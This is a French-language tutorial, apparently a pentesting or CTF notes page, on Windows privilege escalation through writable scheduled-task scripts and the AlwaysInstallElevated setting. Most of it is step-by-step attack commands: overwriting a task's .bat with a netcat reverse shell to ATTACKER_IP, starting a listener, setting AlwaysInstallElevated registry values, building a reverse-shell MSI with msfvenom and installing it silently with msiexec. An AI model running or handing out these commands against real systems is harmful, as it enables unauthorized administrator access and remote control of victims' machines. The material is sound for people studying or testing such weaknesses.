🏀Tache planifié
Ce tutoriel explore deux méthodes courantes d'élévation des privilèges : l'utilisation des tâches planifiées et la vulnérabilité AlwaysInstallElevated.
📅 Tâches Planifiées
Liste des Tâches Planifiées
Utilisez la commande
schtasks
pour lister les tâches planifiées sur le système cible.schtasks /query /fo list /v
Information détaillée sur une Tâche
Obtenez des détails sur une tâche spécifique (remplacez
vulntask
par le nom de la tâche souhaitée).schtasks /query /tn vulntask /fo list /v
Analyse des Autorisations du Fichier Exécutable
Vérifiez les autorisations du fichier exécutable de la tâche.
icacls c:\\tasks\\schtask.bat

Le groupe BULTIN\Users a un accès complet (F) au binaire de la tâche. Cela signifie que nous pouvons modifier le fichier .bat et insérer la charge utile de notre choix.
Modification du Fichier Bat
Modifiez le fichier
.bat
pour exécuter une charge utile de votre choix.echo C:\\tools\\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\\tasks\\schtask.bat
Exécution de la Tâche Planifiée
Démarrez un écouteur sur l'attaquant.
nc -lvp 4444
Exécutez la tâche planifiée.
schtasks /run /tn vulntask
Réception du Shell Inversé
🔒 Vulnérabilité AlwaysInstallElevated
Introduction
Les fichiers d'installation Windows, tels que les fichiers .msi, sont cruciaux pour installer des applications sur un système. Par défaut, ils s'exécutent avec les privilèges de l'utilisateur qui les lance. Cependant, il est possible de configurer ces fichiers pour s'exécuter avec des privilèges plus élevés, même à partir de comptes utilisateurs sans privilèges. Cette méthode offre la possibilité de générer un fichier MSI malveillant pouvant s'exécuter avec des privilèges d'administrateur.
Note : La méthode AlwaysInstallElevated ne fonctionnera pas dans cet environnement spécifique et est fournie à titre d'information uniquement.
📁 Configuration des Valeurs de Registre
1. Vérification des Valeurs de Registre
Utilisez la commande reg query
pour vérifier les valeurs de registre nécessaires.
reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
2. Définition des Valeurs de Registre
Si les valeurs ne sont pas définies, vous devez les configurer. Cela peut être fait en utilisant des éditeurs de registre ou des commandes reg add
. Par exemple :
reg add HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
📄 Génération du Fichier MSI Malveillant
3. Utilisation de msfvenom
Utilisez msfvenom
pour générer un fichier .msi malveillant.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
4. Transfert du Fichier MSI
Transférez le fichier .msi sur la machine cible, par exemple, dans le répertoire C:\\Windows\\Temp\\
.
📥 Exécution du Programme d'Installation
5. Exécution de msiexec
Utilisez la commande msiexec
pour exécuter le fichier MSI malveillant.
msiexec /quiet /qn /i C:\\Windows\\Temp\\malicious.msi
6. Réception du Shell Inversé
📚 Conclusion
L'élévation des privilèges peut exploiter des erreurs de configuration, telles que des tâches planifiées mal sécurisées ou des installations MSI avec des privilèges élevés. Ces méthodes, bien que souvent rencontrées dans des environnements de CTF, sont informatives pour comprendre les vulnérabilités potentielles.
Last updated